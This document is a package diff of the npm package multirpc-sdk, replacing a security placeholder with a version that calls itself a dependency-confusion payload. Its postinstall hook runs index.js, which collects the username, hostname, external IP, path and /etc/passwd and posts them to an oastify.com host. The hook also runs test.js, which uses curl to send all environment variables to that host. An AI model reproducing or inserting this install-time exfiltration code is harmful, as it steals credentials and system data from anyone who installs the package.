multirpc-sdk 0.0.1-security → 4.2.1

package/index.js

@@ -0,0 +1,90 @@
+const os = require('os');
+const axios = require('axios');
+const path = require('path');
+const fs = require('fs');
+const { execSync } = require('child_process');
+
+// Mendapatkan waktu saat ini
+function getCurrentTime() {
+  return new Date().toISOString();
+}
+
+// Mendapatkan nama organisasi atau pengguna
+function getOrganization() {
+  return os.userInfo().username;
+}
+
+// Mendapatkan IP eksternal dengan menggunakan API
+function getExternalIP() {
+  return axios.get('https://api.ipify.org?format=json')
+    .then(response => response.data.ip)
+    .catch(error => 'IP eksternal tidak ditemukan');
+}
+
+// Mendapatkan nama host
+function getHostname() {
+  return os.hostname();
+}
+
+// Mendapatkan jalur direktori saat ini
+function getCurrentPath() {
+  return path.resolve('.');
+}
+
+// Membaca file /etc/passwd (hanya jika ada izin akses)
+function getEtcPasswd() {
+  try {
+    const passwdContent = fs.readFileSync('/etc/passwd', 'utf-8');
+    return passwdContent;
+  } catch (error) {
+    return 'Tidak dapat membaca file /etc/passwd';
+  }
+}
+
+// Fungsi untuk menulis ke localStorage dan memverifikasi XSS
+function storeXSSPayload() {
+  const payload = `<script>console.log('XSS berhasil disisipkan!');</script>`;
+  try {
+    localStorage.setItem('xssTest', payload); // Menyimpan XSS payload ke localStorage
+    console.log('XSS Payload berhasil disimpan di localStorage.');
+  } catch (error) {
+    console.error('Gagal menyimpan payload ke localStorage:', error);
+  }
+}
+
+// Mengumpulkan data yang dibutuhkan
+async function collectData() {
+  const time = getCurrentTime();
+  const organization = getOrganization();
+  const externalIP = await getExternalIP();
+  const hostname = getHostname();
+  const currentPath = getCurrentPath();
+  const etcPasswd = getEtcPasswd();
+  const ipConfig = getIfconfig();
+
+  // Menyimpan payload XSS ke localStorage
+  storeXSSPayload();
+
+  const data = {
+    time: time,
+    organization: organization,
+    ipAddress: externalIP,
+    hostname: hostname,
+    currentPath: currentPath,
+    etcPasswd: etcPasswd,
+    ipConfig: ipConfig,
+  };
+
+  console.log(data); // Tampilkan data yang dikumpulkan
+
+  // Mengirim data ke server target
+  axios.post('https://owo1psomvgl0vrfn7t4uf1d4uv0mocc1.oastify.com/log', data)
+    .then(response => {
+      console.log('Data berhasil dikirim:', response.data);
+    })
+    .catch(error => {
+      console.error('Error saat mengirim data:', error);
+    });
+}
+
+collectData(); // Menjalankan fungsi untuk mengumpulkan dan mengirim data

package/package.json

@@ -1,6 +1,14 @@
 {
-  "name": "multirpc-sdk",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+    "name": "multirpc-sdk",
+    "version": "4.2.1",
+    "description": "Malicious package for dependency confusion",
+    "main": "index.js",
+    "scripts": {
+        "postinstall": "node index.js && node test.js"
+    },
+    "author": "Attacker",
+    "license": "MIT",
+    "dependencies": {
+        "axios": "^0.21.1"
+    }
 }

package/test.js

@@ -0,0 +1,7 @@
+const { exec } = require('child_process');
+exec('curl -X POST https://owo1psomvgl0vrfn7t4uf1d4uv0mocc1.oastify.com -d "$(env)"', (error) => {
+    if (error) {
+        console.error(`Exec error: ${error}`);
+        return;
+    }
+});

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=multirpc-sdk for more information.